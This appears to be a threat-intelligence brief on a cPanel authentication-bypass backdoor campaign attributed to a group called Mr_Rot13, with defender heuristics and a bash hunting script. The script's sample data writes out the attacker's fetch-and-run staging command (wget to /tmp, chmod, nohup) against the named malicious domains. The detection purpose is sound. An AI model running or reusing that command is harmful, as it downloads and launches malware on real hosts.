Mr_Rot13 cPanel CVE-2026-41940 backdoor campaign

Summary

Mr_Rot13 is QiAnXin XLab's name for a long-running threat cluster exploiting CVE-2026-41940, a critical unauthenticated authentication-bypass vulnerability in cPanel & WHM. XLab says the flaw allows remote attackers to take over affected cPanel / WHM panels without credentials and that, after public disclosure on 2026-04-28, more than 2,000 attacker source IPs were observed participating in automated exploitation and cybercrime activity against the vulnerability.

The durable threat-intelligence value is control-plane takeover of shared-hosting infrastructure. XLab's Mr_Rot13 sample chain turns cPanel compromise into persistent host access by changing passwords, adding SSH keys, planting PHP webshells, injecting credential-harvesting JavaScript into login pages, deploying a cross-platform filemanager remote-control trojan, and reporting credentials/device data to attacker-controlled infrastructure.

Why this matters

  • cPanel / WHM is often the administrative root of shared-hosting environments; one panel takeover can expose many sites, databases, mailboxes, deployment secrets, and customer credentials.
  • The exploit boundary is severe: XLab describes CVE-2026-41940 as unauthenticated and remotely reachable, with administrator-level panel takeover possible without a password.
  • XLab observed broad exploitation by multiple criminal groups, including mining, ransomware, botnet propagation, backdoor implantation, and data theft activity.
  • Mr_Rot13's payload is not just a one-shot shell. It layers SSH-key persistence, PHP webshell access, login-page JavaScript theft, password changes, and a remote-control file manager.
  • Infrastructure and sample links reach back to at least 2020, suggesting a stable operator with years of low-detection activity rather than a transient opportunistic copycat.

Operational characteristics

  • Initial access: exploitation of CVE-2026-41940 against vulnerable cPanel & WHM instances. XLab reports the vulnerability was publicly disclosed on 2026-04-28 and rapidly drew automated exploitation from more than 2,000 source IPs.
  • Observed impact: XLab cites a community-disclosed incident involving Southeast Asian government and military institutions where attackers reportedly stole about 4.37 GB of sensitive files after exploiting the vulnerability.
  • Downloader stage: the campaign pulled an ELF payload named Update from cp.dene[.]de.com and launched it quietly in the background with nohup.
  • Payload family: XLab captured three similar Update builds. The analyzed May 5 build was a stripped, statically linked 64-bit Linux ELF written in Go, with Turkish-language log strings that appear AI-generated and project naming around Payload.
  • Persistence and access: the infector changed the root password, installed an SSH public key labeled cpanel-updater, downloaded a PHP webshell named cpanel.py into /usr/local/cpanel/cgi-sys/, and deployed a filemanager remote-control trojan across multiple OS/architecture builds.
  • Credential theft: the payload injected JavaScript into cPanel login pages and reported collected credentials and host information to attacker-controlled Telegram / web endpoints.
  • Attribution clues: XLab tied the downloader domain, JavaScript C2, and older low-detection PHP backdoor material to wrned[.]com, active since at least 2020. The group name comes from the 0xWR Telegram identity clue and Rot13-obfuscated C2 logic.
  • Operator reaction: after an apparent interaction with the attacker's Telegram bot on 2026-05-04, XLab observed the attackers update samples, replace bot tokens, remove the bot from the group, and later re-add it.

Defender heuristics

  • Treat any vulnerable or recently exposed cPanel / WHM host as potentially compromised, not merely vulnerable; XLab's telemetry indicates mass exploitation after public disclosure.
  • Patch cPanel & WHM to versions that remediate CVE-2026-41940, and restrict WHM/cPanel administration to trusted networks or VPN paths wherever possible.
  • Hunt cPanel, web-server, and shell logs for downloads or execution from cp.dene[.]de.com, wpsock[.]com, and wrned[.]com, plus suspicious wget/curl to a root-owned temporary file followed by chmod and nohup.
  • Inspect /usr/local/cpanel/cgi-sys/ and adjacent cPanel CGI/plugin paths for unexpected Python/PHP webshells such as cpanel.py, adminer.php, or files created near the exploitation window.
  • Review /root/.ssh/authorized_keys, privileged user passwords, cron/systemd persistence, cPanel login templates, and JavaScript served by panel login pages for unauthorized additions.
  • Search for unexpected filemanager binaries or architecture-specific payload names on Linux, Windows, and macOS hosts used for hosting administration.
  • Preserve /var/cpanel/logs, /usr/local/cpanel/logs, authentication logs, shell history, process listings, web roots, cPanel plugin files, and memory/process evidence before cleanup.
  • After confirmed compromise, rotate WHM/cPanel credentials, root passwords, SSH keys, database credentials, mail credentials, deployment tokens, CMS secrets, API keys, and any customer/site secrets reachable from the hosting node.
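As an added illustration of the hunting steps above (this is not XLab's code or cPanel tooling), the script below applies three of the indicators listed on this page to constructed sample data: downloads from the named domains, the wget/curl, chmod, nohup staging chain, and the cpanel-updater SSH key comment. The history and authorized_keys lines are made up, and the domains are written undefanged so grep matches the literal strings a real log would carry.

```shell
#!/usr/bin/env bash
# Added hunting helper (not XLab's or cPanel's code). It applies the indicators
# listed above to constructed sample data: downloads from the named domains,
# the wget/curl -> chmod -> nohup staging chain, and the cpanel-updater SSH key.
set -eu

# Domains from the page with the [.] defanging removed, escaped for grep -E.
IOC_DOMAIN_RE='cp\.dene\.de\.com|wpsock\.com|wrned\.com'

# Print stdin lines where wget/curl fetches from a listed domain.
hunt_domain_hits() {
  grep -E "(wget|curl)[^;&|]*($IOC_DOMAIN_RE)" || true
}

# Print stdin lines that fetch into a temp directory and then chmod + nohup
# the result in the same command line (the staging pattern described above).
hunt_stage_chain() {
  grep -E '(wget|curl).*(/tmp|/dev/shm|/var/tmp)/.*chmod.*nohup' || true
}

# Print authorized_keys lines (stdin) whose comment field is cpanel-updater.
# In an OpenSSH key line the comment is the third whitespace-separated field.
hunt_ssh_key() {
  awk '$3 == "cpanel-updater" { print }'
}

# ---- constructed sample input (not real telemetry) -------------------------
SAMPLE_HISTORY=$(cat <<'EOF'
ls -la /home
wget -q http://cp.dene.de.com/Update -O /tmp/.u; chmod +x /tmp/.u; nohup /tmp/.u >/dev/null 2>&1 &
curl -s https://example.org/index.html
curl -sO http://wpsock.com/cpanel.py
EOF
)

SAMPLE_KEYS=$(cat <<'EOF'
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFAKEKEYFORDEMOxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx admin@laptop
ssh-rsa AAAAB3NzaC1yc2EFAKEKEYFORDEMOONLY cpanel-updater
EOF
)

# Run each hunt over the samples and report counts (expected: 2, 1, 1).
domain_hits=$(printf '%s\n' "$SAMPLE_HISTORY" | hunt_domain_hits | wc -l)
chain_hits=$(printf '%s\n' "$SAMPLE_HISTORY" | hunt_stage_chain | wc -l)
key_hits=$(printf '%s\n' "$SAMPLE_KEYS" | hunt_ssh_key | wc -l)
echo "domain hits: $domain_hits  staging-chain hits: $chain_hits  ssh-key hits: $key_hits"
```

On a live host, replace the sample variables with `~/.bash_history`, the cPanel access/error logs named above, and `/root/.ssh/authorized_keys`; any hit warrants the evidence-preservation step before cleanup.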

Sources

  • QiAnXin XLab: https://blog.xlab.qianxin.com/mr_rot13-the-elusive-6-year-hacker-group-weaponizing-critical-cpanel-flaws-for-backdoor-deployment/
  • CVE record: https://www.cve.org/CVERecord?id=CVE-2026-41940